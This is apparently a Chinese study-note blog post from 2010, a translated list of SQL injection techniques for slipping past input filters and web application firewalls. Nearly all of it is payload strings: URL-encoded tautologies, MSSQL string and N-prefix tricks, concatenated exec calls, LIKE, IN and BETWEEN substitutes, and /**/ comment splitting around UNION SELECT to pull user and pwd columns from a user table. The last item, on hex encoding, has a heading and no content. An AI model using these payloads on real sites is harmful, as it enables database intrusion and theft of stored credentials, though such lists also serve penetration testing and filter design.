injection techniques to anti bypass翻译

2010年01月12日 | 学习笔记| 坏人咖啡

作者：Mickey

injection_techniques_to_anti_bypass 翻译

1.
or 1=1经urlencode编码后%6f%72%20%31%3d%31

2.
移除空格or’swords’=’swords’(仅对mssql)

3.
使用字符串or’sword’=’swords’替代经典的or 1=1

4.
’swords’=N’swords’ (仅对mssql)

5.
’swords’=’sw’+’ords’
exec(‘in’+’sert into’+’…’)

6.
使用like绕过’=’,’>’限制
or’swords’ like ’sw’

7.
使用IN绕过
or ’swords’ IN (’swords’)

8.
使用BETWEEN绕过
or ’swords’ BETWEEN ‘rw’ AND ‘tw’

9.
or ’swords’>’sw’
or ’swords’<’tw’

10.
使用/**/替代空格,分割敏感的字符
UNION/**/SELECT/**/user,pwd from tbluser
U/**/NION/**/SE/**/LECT/**/user,pwd from tbluser

11.
使用16进制